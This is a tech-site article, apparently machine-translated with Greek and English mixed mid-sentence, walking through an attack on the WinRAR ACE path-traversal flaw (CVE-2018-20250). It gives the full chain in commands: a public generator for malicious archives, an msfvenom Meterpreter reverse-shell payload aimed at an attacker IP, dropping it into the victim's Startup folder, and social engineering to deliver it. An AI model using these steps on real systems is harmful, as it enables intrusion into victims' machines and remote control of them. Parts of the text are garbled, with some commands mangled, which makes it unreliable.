WinRAR running malicious code from the application

Below we will discuss how WinRAR fixed seriously τα ασφαλείας τον περασμένο μήνα. Η WinRAR είναι μία από τις πιο δημοφιλείς εφαρμογές συμπίεσης αρχείων στον κόσμο, και η ευπάθεια που θα περιγράψουμε παρακάτω μπορεί να εξαπατήσει ένα χρήστη της εφαρμογής για την εξ malicious files.

WinRAR

The vulnerability identified last year by research.checkpoint.com affects all releases released by the company in the last 19 years.

CVE-ID: CVE-2018-20250, CVE-2018-20251, CVE-2018-20252 and CVE-2018-20253

Version: WinRAR 5.70 Beta 1

This vulnerability is due to the UNACEV2.DLL library included in all versions of WinRAR. Winrar uses the ACE format to compress and decompress a folder using UNACE.DLL.

In WinRAR versions before 5.61, there is a path traversal κατά την εκπόνηση του πεδίου του filename field της μορφής ACE (στο UNACEV2.dll). Όταν το filename field διαχειρίζεται με συγκεκριμένα μοτίβα, ο φάκελος προορισμού (εξ) αγνοείται, αντιμετωπίζοντας έτσι το όνομα αρχείου σαν μια απόλυτη διαδρομή. Αυτό συμβαίνει λόγω ακατάλληλης σύνταξης όταν χρησιμοποιείται το unace.dll.

Let's download a python script that will create a malicious file in rar format. Once you have downloaded the Python script, install the dependencies needed to run it.

git clone //github.com/manulqwerty/Evil-WinRAR-Gen.git cd Evil-WinRAR-Gen/ pip3  -r requirements.txt


Additionally, you should grant full permissions to the python script in the Evil-Winrar-Gen folder and then create a malicious exe file with msfvenom. Name "winrar.exe" as shown in Metasploit.

chmod 777 evilWinRAR.py msfvenom -p windows / meterpreter / reverse_tcp lhost = 192.168.1.110 lport = 1234 -f exe> winrar.exe


Now create a text file that will appear to the victim when exporting the rar file. Then run the evilWinrar python script along with the malicious exe file and the text file, creating a malicious file that you can send to the target.

touch winrar.txt ./evilWinRAR.py -e winrar.exe -g winrar.txt python -m SimpleHTTPServer 8080

As we said, this vulnerability allows us to extract the malicious file from an arbitrary path, and with the help of this script we will allow extracting rar files to /startup program. Now use social engineering to give the malicious rar to the victim and wait until the victim reboots their machine to get reverse connection to objective.

There is currently no startup program on the victim's machine as shown below. Once the victim extracts the malicious rar file "evil.rar", the backdoor winrar.exe will be extracted from the startup program.WinRAR

To ensure that the winrar.exe file is in the boot folder, type shell: startup in run prompt.

WinRAR

Once the victim restarts the machine, you will receive a reverse connection as shown below.

WinRAR

Author: Aarti Singh

iGuRu.gr The Best Technology Site in Greecefgns

every publication, directly to your inbox

Join the 2.100 registrants.

Written by giorgos

George still wonders what he's doing here ...

Leave a reply

Your email address is not published. Required fields are mentioned with *

Your message will not be published if:
1. Contains insulting, defamatory, racist, offensive or inappropriate comments.
2. Causes harm to minors.
3. It interferes with the privacy and individual and social rights of other users.
4. Advertises products or services or websites.
5. Contains personal information (address, phone, etc.).